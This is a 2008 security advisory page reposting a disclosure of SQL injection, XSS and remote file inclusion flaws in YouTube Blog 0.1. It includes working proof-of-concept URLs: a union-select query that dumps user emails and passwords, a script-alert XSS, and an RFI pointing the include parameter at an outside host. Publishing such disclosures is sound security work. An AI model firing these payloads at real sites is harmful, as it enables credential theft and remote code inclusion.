|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | YouTube Blog 0.1 (RFI/SQL/XSS) Multiple Remote Vulnerabilities
|
SecurityAlert : 4037
CVE : CVE-2008-3305 CVE : CVE-2008-3307 CVE : CVE-2008-3308 CWE : CWE-79
SecurityRisk : Low (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : Yes
Exploit Available : No
Credit : C. H. R. O. O. T.
Published : 27.07.2008
Affected Software : | Carlos Desseno, Youtube_blog, 0.1 |
 Advisory Content : _____ _ _ _____ _____ _____ _____
/ ___| |_| | _ \| _ | _ |_ _|
| (___| _ | [_)_/| (_) | (_) | | |
\_____|_| |_|_| |_||_____|_____| |_|
C. H. R. O. O. T. SECURITY GROUP
- -- ----- --- -- -- ---- --- -- -
http://www.chroot.org
_ _ _ _____ ____ ____ __ _
Hacks In Taiwan | |_| | |_ _| __| | \| |
Conference 2008 | _ | | | | | (__| () | |
|_| |_|_| |_| \____|____|_|\__|
http://www.hitcon.org
Title =======:: YouTube Blog 0.1 Multiple Remote Vulnerabilities
Author ======:: unohope [at] chroot [dot] org
IRC =========:: irc.chroot.org #chroot
ScriptName ==:: YouTube Blog
Download ====::
http://nchc.dl.sourceforge.net/sourceforge/youtubeblog/ytb_v0.1.zip
Mirror ======:: http://www.badongo.com/file/10507193
______________________
magic_quotes_gpc = Off
safe_mode = Off
_____
[SQL]
http://victim/ytb/todos.php?id=-99+union+select+1,2,mail,contrasena,5,6,7+f
rom+ytb_usuarios+where+id=1/*
_____
[XSS]
http://victim/ytb/mensaje.php?m=<script>alert(/xss/)</script>
_____
[RFI]
http://victim/ytb/cuenta/cuerpo.php?base_archivo=http://192.168.1.111/blah.
txt
and more .. = =
______
[NOTE]
!! This is just for educational purposes, DO NOT use for illegal. !!
References :
http://securityreason.com/expldownload/1/4379/1 (Exploit)
http://xforce.iss.net/xforce/xfdb/43953
http://www.securityfocus.com/bid/30345
http://www.milw0rm.com/exploits/6117
http://secunia.com/advisories/31161
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|